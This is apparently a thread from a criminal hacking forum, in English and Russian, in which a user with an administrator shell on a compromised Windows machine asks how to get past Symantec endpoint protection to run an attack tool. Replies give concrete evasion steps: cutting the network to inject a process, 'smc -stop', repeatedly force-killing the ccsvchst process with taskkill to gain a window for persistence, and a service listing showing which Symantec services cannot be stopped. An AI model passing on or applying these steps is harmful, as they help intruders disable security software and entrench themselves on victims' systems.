AV\EDR Bypassing Symantec endpoint security

SDA · 21.02.2024

Hi
I have shell from a windows system but it has Symantec installed
Can anybody give some hints to bypass it? I want to run cs

xusernamex666 · 21.02.2024

Symantec uses only cloud
turn off internet, inject process, turn on
Worked some time ago

SDA · 21.02.2024

xusernamex666 сказал(а):

Symantec uses only cloud
turn off internet, inject process, turn on
Worked some time ago

I only have shell access not remote

netbios · 21.02.2024

smc -stop

RedNode · 22.02.2024

what permissions is your remote shell has ?

SDA · 23.02.2024

RedNode сказал(а):

what permissions is your remote shell has ?

administrator

thecount · 07.07.2024

xusernamex666 сказал(а):

Symantec uses only cloud
turn off internet, inject process, turn on
Worked some time ago

how he can be still connect if he turn off internet ?

mil0 · 08.07.2024

если есть права админа надо несколько раз сделать
get-process -name ccsvchst

taskkill /f /im ccsvchst*

потом временно вырубается с ошибкой и можно успеть закрепится.
Иногда работает

xargs · 09.07.2024

netbios сказал(а):

smc -stop

нельзя же NOT_STOPPABLE, NOT_PAUSABLE тоже ищу как с ним бороться, немного научился обманывать на ps1 скриптах но не с каждым получается.

Код:

SERVICE_NAME: SepMasterService
DISPLAY_NAME: Symantec Endpoint Protection
        TYPE               : 10  WIN32_OWN_PROCESS 
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: sepWscSvc
DISPLAY_NAME: Symantec Endpoint Protection WSC Service
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: SsPaAdm
DISPLAY_NAME: Symantec.cloud Cloud Agent
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: ssPaSetMgr
DISPLAY_NAME: Symantec.cloud Scheduler
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
SERVICE_NAME: ssSpnAv
DISPLAY_NAME: Symantec.cloud Endpoint Protection
        TYPE               : 20  WIN32_SHARE_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)

AV\EDR Bypassing Symantec endpoint security

SDA

Buying USA Accesses

xusernamex666

CD-диск

SDA

Buying USA Accesses

netbios

RAID-массив

RedNode

rednode hvnc developer

SDA

Buying USA Accesses

thecount

ripper

mil0

HDD-drive

xargs

Quad Robber